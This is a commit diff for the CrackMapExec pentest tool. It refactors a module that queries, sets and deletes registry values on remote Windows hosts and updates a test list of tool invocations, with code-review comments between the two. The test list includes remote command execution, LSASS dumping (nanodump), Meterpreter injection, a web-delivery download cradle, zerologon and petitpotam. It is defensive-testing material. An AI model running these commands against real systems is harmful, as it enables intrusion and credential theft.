tests: update tests
parent
ac563f1b91
commit
7da0b71fa8
|
@ -7,21 +7,29 @@ from impacket.examples.secretsdump import RemoteOperations
|
||||||
|
|
||||||
|
|
||||||
class CMEModule:
|
class CMEModule:
|
||||||
name = 'reg-query'
|
def __init__(self, context=None):
|
||||||
description = 'Performs a registry query on the machine'
|
self.delete = None
|
||||||
supported_protocols = ['smb']
|
self.type = None
|
||||||
opsec_safe = True
|
self.value = None
|
||||||
multiple_hosts = True
|
self.key = None
|
||||||
|
self.path = None
|
||||||
|
self.name = 'reg-query'
|
||||||
|
self.description = 'Performs a registry query on the machine'
|
||||||
|
self.supported_protocols = ['smb']
|
||||||
|
self.opsec_safe = True
|
||||||
|
self.multiple_hosts = True
|
||||||
|
self.context = context
|
||||||
|
|
||||||
def options(self, context, module_options):
|
def options(self, context, module_options):
|
||||||
'''
|
"""
|
||||||
PATH: Registry key path to query
|
PATH Registry key path to query
|
||||||
KEY: Registry key value to retrieve
|
KEY Registry key value to retrieve
|
||||||
VALUE Registry key value to set (only used for modification). Will add a new regitry key if use on registry key that does not already exist
|
VALUE Registry key value to set (only used for modification)
|
||||||
TYPE Type of registry to modify, add or delete. Default type : REG_SZ. Type supported : REG_NONE, REG_SZ, REG_EXPAND_SZ,REG_BINARY, REG_DWORD, REG_DWORD_BIG_ENDIAN, REG_LINK, REG_MULTI_SZ, REG_QWORD
|
Will add a new registry key if the registry key does not already exist
|
||||||
|
TYPE Type of registry to modify, add or delete. Default type : REG_SZ.
|
||||||
|
Type supported: REG_NONE, REG_SZ, REG_EXPAND_SZ,REG_BINARY, REG_DWORD, REG_DWORD_BIG_ENDIAN, REG_LINK, REG_MULTI_SZ, REG_QWORD
|
||||||
DELETE If set to True, delete a registry key if it does exist
|
DELETE If set to True, delete a registry key if it does exist
|
||||||
'''
|
"""
|
||||||
|
|
||||||
self.context = context
|
self.context = context
|
||||||
self.path = None
|
self.path = None
|
||||||
self.key = None
|
self.key = None
|
||||||
|
@ -54,12 +62,12 @@ class CMEModule:
|
||||||
try :
|
try :
|
||||||
self.value = int(self.value)
|
self.value = int(self.value)
|
||||||
except:
|
except:
|
||||||
context.log.error("Invalid registry value type specified: %s" % self.value)
|
context.log.error(f"Invalid registry value type specified: {self.value}")
|
||||||
sys.exit(1)
|
return
|
||||||
if self.type in type_dict:
|
if self.type in type_dict:
|
||||||
self.type = type_dict[self.type]
|
self.type = type_dict[self.type]
|
||||||
else:
|
else:
|
||||||
context.log.error("Invalid registry value type specified: %s" % self.type)
|
context.log.error(f"Invalid registry value type specified: {self.type}")
|
||||||
return
|
return
|
||||||
else:
|
else:
|
||||||
self.type = 1
|
self.type = 1
|
||||||
|
@ -68,83 +76,114 @@ class CMEModule:
|
||||||
self.delete = True
|
self.delete = True
|
||||||
|
|
||||||
def on_admin_login(self, context, connection):
|
def on_admin_login(self, context, connection):
|
||||||
|
self.context = context
|
||||||
if not self.path:
|
if not self.path:
|
||||||
context.log.error("Please provide the path of the registry to query")
|
self.context.log.error("Please provide the path of the registry to query")
|
||||||
return
|
return
|
||||||
|
|
||||||
if not self.key:
|
if not self.key:
|
||||||
context.log.error("Please provide the registry key to query")
|
self.context.log.error("Please provide the registry key to query")
|
||||||
return
|
return
|
||||||
|
|
||||||
remoteOps = RemoteOperations(connection.conn, False)
|
remote_ops = RemoteOperations(connection.conn, False)
|
||||||
remoteOps.enableRegistry()
|
remote_ops.enableRegistry()
|
||||||
|
|
||||||
try:
|
try:
|
||||||
if "HKLM" in self.path or "HKEY_LOCAL_MACHINE" in self.path:
|
if "HKLM" in self.path or "HKEY_LOCAL_MACHINE" in self.path:
|
||||||
self.path = (self.path).replace('HKLM\\', '')
|
self.path = self.path.replace('HKLM\\', '')
|
||||||
ans = rrp.hOpenLocalMachine(remoteOps._RemoteOperations__rrp)
|
ans = rrp.hOpenLocalMachine(remote_ops._RemoteOperations__rrp)
|
||||||
|
|
||||||
elif "HKCU" in self.path or "HKEY_CURRENT_USER" in self.path:
|
elif "HKCU" in self.path or "HKEY_CURRENT_USER" in self.path:
|
||||||
self.path = (self.path).replace('HKCU\\', '')
|
self.path = self.path.replace('HKCU\\', '')
|
||||||
ans = rrp.hOpenCurrentUser(remoteOps._RemoteOperations__rrp)
|
ans = rrp.hOpenCurrentUser(remote_ops._RemoteOperations__rrp)
|
||||||
|
|
||||||
elif "HKCR" in self.path or "HKEY_CLASSES_ROOT" in self.path:
|
elif "HKCR" in self.path or "HKEY_CLASSES_ROOT" in self.path:
|
||||||
self.path = (self.path).replace('HKCR\\', '')
|
self.path = self.path.replace('HKCR\\', '')
|
||||||
ans = rrp.hOpenClassesRoot(remoteOps._RemoteOperations__rrp)
|
ans = rrp.hOpenClassesRoot(remote_ops._RemoteOperations__rrp)
|
||||||
|
|
||||||
else:
|
else:
|
||||||
context.log.error("Unsupported registry hive specified in path: %s" % self.path)
|
self.context.log.error(f"Unsupported registry hive specified in path: {self.path}")
|
||||||
return
|
return
|
||||||
|
|
||||||
regHandle = ans['phKey']
|
reg_handle = ans['phKey']
|
||||||
ans = rrp.hBaseRegOpenKey(remoteOps._RemoteOperations__rrp, regHandle, self.path)
|
ans = rrp.hBaseRegOpenKey(
|
||||||
keyHandle = ans['phkResult']
|
remote_ops._RemoteOperations__rrp,
|
||||||
|
reg_handle,
|
||||||
|
self.path
|
||||||
|
)
|
||||||
|
key_handle = ans['phkResult']
|
||||||
|
|
||||||
if self.delete:
|
if self.delete:
|
||||||
# Delete registry
|
# Delete registry
|
||||||
try:
|
try:
|
||||||
# Check if value exists
|
# Check if value exists
|
||||||
dataType, reg_value = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, self.key)
|
data_type, reg_value = rrp.hBaseRegQueryValue(
|
||||||
|
remote_ops._RemoteOperations__rrp,
|
||||||
|
key_handle,
|
||||||
|
self.key
|
||||||
|
)
|
||||||
except:
|
except:
|
||||||
self.context.log.error("Registry key %s does not exist" % (self.key))
|
self.context.log.error(f"Registry key {self.key} does not exist")
|
||||||
return
|
return
|
||||||
# Delete value
|
# Delete value
|
||||||
rrp.hBaseRegDeleteValue(remoteOps._RemoteOperations__rrp, keyHandle, self.key)
|
rrp.hBaseRegDeleteValue(
|
||||||
self.context.log.success('Registry key %s has been deleted successfully' % (self.key))
|
remote_ops._RemoteOperations__rrp,
|
||||||
rrp.hBaseRegCloseKey(remoteOps._RemoteOperations__rrp, keyHandle)
|
key_handle,
|
||||||
|
self.key
|
||||||
|
)
|
||||||
|
self.context.log.success(f"Registry key {self.key} has been deleted successfully")
|
||||||
|
rrp.hBaseRegCloseKey(
|
||||||
|
remote_ops._RemoteOperations__rrp,
|
||||||
|
key_handle
|
||||||
|
)
|
||||||
|
|
||||||
if self.value is not None:
|
if self.value is not None:
|
||||||
# Check if value exists
|
# Check if value exists
|
||||||
try:
|
try:
|
||||||
# Check if value exists
|
# Check if value exists
|
||||||
dataType, reg_value = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, self.key)
|
data_type, reg_value = rrp.hBaseRegQueryValue(
|
||||||
self.context.log.highlight("Key %s exists with value %s" % (self.key, reg_value))
|
remote_ops._RemoteOperations__rrp,
|
||||||
|
key_handle,
|
||||||
|
self.key
|
||||||
|
)
|
||||||
|
self.context.log.highlight(f"Key {self.key} exists with value {reg_value}")
|
||||||
# Modification
|
# Modification
|
||||||
rrp.hBaseRegSetValue(remoteOps._RemoteOperations__rrp, keyHandle, self.key, self.type, self.value)
|
rrp.hBaseRegSetValue(
|
||||||
context.log.success("Key %s has been modified to %s" % (self.key, self.value))
|
remote_ops._RemoteOperations__rrp,
|
||||||
|
key_handle,
|
||||||
|
self.key,
|
||||||
|
self.type,
|
||||||
|
self.value
|
||||||
|
)
|
||||||
|
self.context.log.success(f"Key {self.key} has been modified to {self.value}")
|
||||||
except:
|
except:
|
||||||
rrp.hBaseRegSetValue(remoteOps._RemoteOperations__rrp, keyHandle, self.key, self.type, self.value)
|
rrp.hBaseRegSetValue(
|
||||||
self.context.log.success("New Key %s has been added with value %s" % (self.key, self.value))
|
remote_ops._RemoteOperations__rrp,
|
||||||
rrp.hBaseRegCloseKey(remoteOps._RemoteOperations__rrp, keyHandle)
|
key_handle,
|
||||||
|
self.key,
|
||||||
|
self.type,
|
||||||
|
self.value
|
||||||
|
)
|
||||||
|
self.context.log.success(f"New Key {self.key} has been added with value {self.value}")
|
||||||
|
rrp.hBaseRegCloseKey(
|
||||||
|
remote_ops._RemoteOperations__rrp,
|
||||||
|
key_handle
|
||||||
|
)
|
||||||
else:
|
else:
|
||||||
# Query
|
# Query
|
||||||
try:
|
try:
|
||||||
dataType, reg_value = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, self.key)
|
data_type, reg_value = rrp.hBaseRegQueryValue(
|
||||||
context.log.highlight("%s: %s" % (self.key, reg_value))
|
remote_ops._RemoteOperations__rrp,
|
||||||
|
key_handle,
|
||||||
|
self.key
|
||||||
|
)
|
||||||
|
self.context.log.highlight(f"{self.key}: {reg_value}")
|
||||||
except:
|
except:
|
||||||
if self.delete:
|
if self.delete:
|
||||||
pass
|
pass
|
||||||
else:
|
else:
|
||||||
self.context.log.error("Registry key %s does not exist" % (self.key))
|
self.context.log.error(f"Registry key {self.key} does not exist")
|
||||||
return
|
return
|
||||||
rrp.hBaseRegCloseKey(remoteOps._RemoteOperations__rrp, keyHandle)
|
rrp.hBaseRegCloseKey(remote_ops._RemoteOperations__rrp, key_handle)
|
||||||
|
|
||||||
except DCERPCException as e:
|
except DCERPCException as e:
|
||||||
#context.log.error("DCERPC Error while querying or modifying registry: %s" % e)
|
self.context.log.error(f"DCERPC Error while querying or modifying registry: {e}")
|
||||||
pass
|
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
context.log.error("Error while querying or modifying registry: %s" % e)
|
self.context.log.error(f"Error while querying or modifying registry: {e}")
|
||||||
|
|
||||||
finally:
|
finally:
|
||||||
remoteOps.finish()
|
remote_ops.finish()
|
||||||
|
|
|
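Review bot: The hive dispatch in on_admin_login only strips the short prefix, so a PATH given as `HKEY_LOCAL_MACHINE\...` (or HKCU/HKCR long form) passes the `in` test but reaches `hBaseRegOpenKey` with the hive name still in front, and the substring test also matches a hive token anywhere in the path rather than as its first component; splitting off the first component once, as below, fixes both. The bare `except:` around `hBaseRegQueryValue` in the VALUE branch turns any RPC or transport failure into "value does not exist" and then issues `hBaseRegSetValue` anyway, so it should catch only the exception impacket raises for a missing value and let everything else reach the outer `DCERPCException` handler. Handle lifecycle is also inconsistent: the DELETE branch closes `key_handle` and then falls through to the query branch, which uses and closes it again, while the successful-modification path never closes it — closing once in the existing `finally` next to `remote_ops.finish()` would be simpler. In the `__init__` hunk, `self.description = 'Performs a registry query on the machine'` and `self.opsec_safe = True` describe a read-only module although this code also writes and deletes values; the docstring in `options` should say so too.
```python
            hive, _, sub_path = self.path.partition('\\')
            hive = hive.upper()
            if hive in ('HKLM', 'HKEY_LOCAL_MACHINE'):
                ans = rrp.hOpenLocalMachine(remote_ops._RemoteOperations__rrp)
            elif hive in ('HKCU', 'HKEY_CURRENT_USER'):
                ans = rrp.hOpenCurrentUser(remote_ops._RemoteOperations__rrp)
            elif hive in ('HKCR', 'HKEY_CLASSES_ROOT'):
                ans = rrp.hOpenClassesRoot(remote_ops._RemoteOperations__rrp)
            else:
                self.context.log.error(f"Unsupported registry hive specified in path: {self.path}")
                return
            # keep only the sub-key path for hBaseRegOpenKey
            self.path = sub_path
            # … unchanged: hBaseRegOpenKey, delete / set / query branches …
```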
@ -1,3 +1,4 @@
|
||||||
|
##### SMB
|
||||||
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS
|
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS
|
||||||
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS --shares
|
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS --shares
|
||||||
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS --shares --filter-shares READ WRITE
|
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS --shares --filter-shares READ WRITE
|
||||||
|
@ -20,6 +21,7 @@ crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -x whoami
|
||||||
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -X whoami
|
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -X whoami
|
||||||
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -X whoami --obfs
|
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -X whoami --obfs
|
||||||
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS --wmi "os get"
|
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS --wmi "os get"
|
||||||
|
##### SMB Modules
|
||||||
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M bh_owned
|
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M bh_owned
|
||||||
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M dfscoerce
|
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M dfscoerce
|
||||||
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M drop-sc
|
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M drop-sc
|
||||||
|
@ -58,7 +60,7 @@ crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M rdcman
|
||||||
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M rdp --options
|
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M rdp --options
|
||||||
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M rdp -o ACTION=enable
|
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M rdp -o ACTION=enable
|
||||||
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M rdp -o ACTION=disable
|
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M rdp -o ACTION=disable
|
||||||
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M reg-query
|
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M reg-query -o PATH=HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion KEY=DevicePath
|
||||||
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M runasppl
|
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M runasppl
|
||||||
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M scuffy -o SERVER=127.0.0.1 NAME=test
|
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M scuffy -o SERVER=127.0.0.1 NAME=test
|
||||||
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M shadowcoerce
|
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M shadowcoerce
|
||||||
|
@ -122,8 +124,10 @@ crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M veeam --options
|
||||||
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M wifi --options
|
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M wifi --options
|
||||||
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M winscp --options
|
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M winscp --options
|
||||||
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M zerologon --options
|
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M zerologon --options
|
||||||
|
##### SMB Anonymous Auth
|
||||||
crackmapexec smb TARGET -u '' -p '' -M zerologon
|
crackmapexec smb TARGET -u '' -p '' -M zerologon
|
||||||
crackmapexec smb TARGET -u '' -p '' -M petitpotam
|
crackmapexec smb TARGET -u '' -p '' -M petitpotam
|
||||||
|
##### LDAP
|
||||||
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS --users
|
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS --users
|
||||||
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS --groups
|
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS --groups
|
||||||
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS --get-sid
|
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS --get-sid
|
||||||
|
@ -132,6 +136,7 @@ crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS --kerberoasting /tmp/o
|
||||||
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS --trusted-for-delegation
|
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS --trusted-for-delegation
|
||||||
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS --admin-count
|
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS --admin-count
|
||||||
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS --gmsa
|
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS --gmsa
|
||||||
|
##### LDAP Modules
|
||||||
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M adcs
|
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M adcs
|
||||||
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M adcs --options
|
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M adcs --options
|
||||||
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M daclread
|
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M daclread
|
||||||
|
@ -154,18 +159,27 @@ crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M user-desc
|
||||||
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M user-desc --options
|
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M user-desc --options
|
||||||
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M whoami
|
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M whoami
|
||||||
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M whoami --options
|
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M whoami --options
|
||||||
crackmapexec winrm TARGET -u USERNAME -p PASSWORD
|
##### WINRM
|
||||||
crackmapexec winrm TARGET -u USERNAME -p PASSWORD -X whoami
|
crackmapexec winrm TARGET -u USERNAME -p PASSWORD KERBEROS
|
||||||
crackmapexec winrm TARGET -u USERNAME -p PASSWORD --laps
|
crackmapexec winrm TARGET -u USERNAME -p PASSWORD KERBEROS -X whoami
|
||||||
crackmapexec mssql TARGET -u USERNAME -p PASSWORD
|
crackmapexec winrm TARGET -u USERNAME -p PASSWORD KERBEROS --laps
|
||||||
|
crackmapexec mssql TARGET -u USERNAME -p PASSWORD KERBEROS
|
||||||
|
##### MSSQL
|
||||||
|
crackmapexec mssql TARGET -u USERNAME -p PASSWORD KERBEROS
|
||||||
|
##### MSSQL Modules
|
||||||
# crackmapexec mssql TARGET -u USERNAME -p PASSWORD -M empire_exec
|
# crackmapexec mssql TARGET -u USERNAME -p PASSWORD -M empire_exec
|
||||||
crackmapexec mssql TARGET -u USERNAME -p PASSWORD -M met_inject -o SRVHOST=127.0.0.1 SRVPORT=4444 RAND=12345
|
crackmapexec mssql TARGET -u USERNAME -p PASSWORD KERBEROS -M met_inject -o SRVHOST=127.0.0.1 SRVPORT=4444 RAND=12345
|
||||||
crackmapexec mssql TARGET -u USERNAME -p PASSWORD -M met_inject --options
|
crackmapexec mssql TARGET -u USERNAME -p PASSWORD KERBEROS -M met_inject --options
|
||||||
crackmapexec mssql TARGET -u USERNAME -p PASSWORD -M mssql_priv
|
crackmapexec mssql TARGET -u USERNAME -p PASSWORD KERBEROS -M mssql_priv
|
||||||
crackmapexec mssql TARGET -u USERNAME -p PASSWORD -M mssql_priv --options
|
crackmapexec mssql TARGET -u USERNAME -p PASSWORD KERBEROS -M mssql_priv --options
|
||||||
crackmapexec mssql TARGET -u USERNAME -p PASSWORD -M nanodump
|
crackmapexec mssql TARGET -u USERNAME -p PASSWORD KERBEROS -M nanodump
|
||||||
crackmapexec mssql TARGET -u USERNAME -p PASSWORD -M nanodump --options
|
crackmapexec mssql TARGET -u USERNAME -p PASSWORD KERBEROS -M nanodump --options
|
||||||
crackmapexec mssql TARGET -u USERNAME -p PASSWORD -M test_connection --options
|
crackmapexec mssql TARGET -u USERNAME -p PASSWORD KERBEROS -M test_connection --options
|
||||||
crackmapexec mssql TARGET -u USERNAME -p PASSWORD -M test_connection -o HOST=localhost
|
crackmapexec mssql TARGET -u USERNAME -p PASSWORD KERBEROS -M test_connection -o HOST=localhost
|
||||||
crackmapexec mssql TARGET -u USERNAME -p PASSWORD -M web_delivery --options
|
crackmapexec mssql TARGET -u USERNAME -p PASSWORD KERBEROS -M web_delivery --options
|
||||||
crackmapexec mssql TARGET -u USERNAME -p PASSWORD -M web_delivery -o URL=localhost/dl_cradle
|
crackmapexec mssql TARGET -u USERNAME -p PASSWORD KERBEROS -M web_delivery -o URL=localhost/dl_cradle
|
||||||
|
# a bit janky, but we try to enable RDP before testing RDP
|
||||||
|
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M rdp -o ACTION=enable
|
||||||
|
##### RDP
|
||||||
|
crackmapexec rdp TARGET -u USERNAME -p PASSWORD KERBEROS
|
||||||
|
crackmapexec rdp TARGET -u USERNAME -p PASSWORD KERBEROS --nla-screenshot
|
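Review bot: The new reg-query line only exercises the read path (`PATH=... KEY=DevicePath`); the module's VALUE and DELETE options, which write to and remove from the registry, get no coverage here. A set-then-query-then-delete sequence against a throwaway key (constructed example: `-o PATH=HKLM\\SOFTWARE\\CME_TEST KEY=probe VALUE=1`, then the same with `DELETE=True`) would cover the write branches and leave the target as it was. The `rdp -o ACTION=enable` line added under the "a bit janky" comment has no matching `ACTION=disable` after the RDP section, so a run leaves RDP enabled on the target; adding the disable at the end keeps the suite from changing host state.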